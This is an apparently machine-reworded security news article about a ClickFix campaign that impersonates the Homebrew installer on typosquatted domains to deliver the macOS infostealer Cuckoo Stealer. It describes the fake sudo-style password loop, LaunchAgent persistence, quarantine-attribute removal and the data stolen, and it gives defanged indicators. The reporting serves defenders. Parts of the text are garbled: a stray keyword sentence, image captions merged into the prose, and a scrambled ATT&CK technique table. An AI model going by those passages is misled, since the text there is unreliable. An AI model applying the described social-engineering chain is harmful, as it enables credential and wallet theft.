Instead of exploiting software flaws, a recent macOS malware campaign is abusing developer practices This article explores homebrew command malicious. . Security researchers have discovered a ClickFix campaign that poses as the well-known Homebrew package manager installer in order to distribute a new infostealer called Cuckoo Stealer.

ClickFix is a method of social engineering. Attackers deceive users into executing malicious commands themselves rather than directly breaching macOS security. Victims see an installation command with a handy "Copy" button when they visit a phony software page that appears authentic. The attack runs with complete user permission after it has been copied and pasted into Terminal.

Attackers in this case produced typosquatted domains that bore a striking resemblance to the official Homebrew website. What looks like a typical installation command is displayed on the page: A trustworthy GitHub source provides a genuine Homebrew command.

The malicious version stealthily reroutes traffic to a server under the control of the attacker. Only a few characters separate them, making them simple to overlook at a glance. Because developers and administrators frequently install tools using curl and bash, the technique is especially effective against them.

The command looks genuine when you see familiar flags like -fsSL. Details of homabrews[. ]org's domain registration through NameCheap and a high-risk assessment are displayed in Hunt (Source: hunt). The script executes a hidden authentication loop after it has finished running.

Until the right credentials are entered, it keeps asking the user for a password using macOS Directory Services (dscl authonly). Victims seldom suspect anything because the prompt appears exactly like a typical sudo request.

The script silently launches Cuckoo Stealer, a second-stage payload, after obtaining a working password. Instead of a single phishing page, researchers found several related domains hosted on shared infrastructure, suggesting a well-organized operation. Dozens of comparable ClickFix pages targeted at macOS were also found by infrastructure searches, indicating an expanding delivery trend.

Capabilities of Cuckoo Stealers Cuckoo Stealer is more than just a password-cracker. It combines remote-access trojan (RAT) functionality with a feature-rich macOS infostealer. The malware installs persistence using a LaunchAgent called com.homebrew.brewupdater.plist as soon as it is infected, and it deletes macOS quarantine attributes to prevent security alerts. This enables the malware to launch automatically each time the user logs in.

Hunt.io's phishing URL detection feature displays several flagged URLs, including the crucial raw.The subdomain homabrews[. ]org (Source: hunt) The malware uses the X25519 key exchange to communicate with its command-and-control server over encrypted HTTPS, giving attackers remote control of the device. Theft of data is widespread.

The malware's targets are: Cookies, session tokens, and browser passwords on macOS Keychain credentials The database of Apple Notes Sessions on Telegram and Discord FTP and VPN setups Screenshots and desktop documents Over 20 wallets for cryptocurrencies In addition, it has the ability to browse files, run shell commands, restart the computer, and even delete itself to remove evidence. A regional filtering feature was observed by the researchers: systems set up for specific CIS language settings are bypassed, a practice frequently observed in organized cybercrime groups.

The campaign emphasizes a crucial security lesson: human behavior is becoming a bigger factor in modern attacks. Hunt hosts several malicious domains on a shared IP infrastructure at 5.255.123[. ]244 (Source: hunt).

Technically, macOS protections were never "bypassed," the command appeared authentic, and the page appeared authentic. Rather, users themselves unwittingly gave their consent for the infection. Strategy Method Description of the ID First Access T1189 Drive-by through phony websites T1059.004 execution Persistence T1543.001 Unix shell curl/bash Defense of LaunchAgent Creation Evasion T1027: Obfuscated strings Access Credential T1555.001 Theft of keychains Screen capture C2 T1573.002 for Collection T1113 Channel encryption Organizations must treat copy-paste commands from websites as possible threats and teach users to confirm sources before executing Terminal commands, according to Hunt, as attackers move toward social-engineering techniques like ClickFix.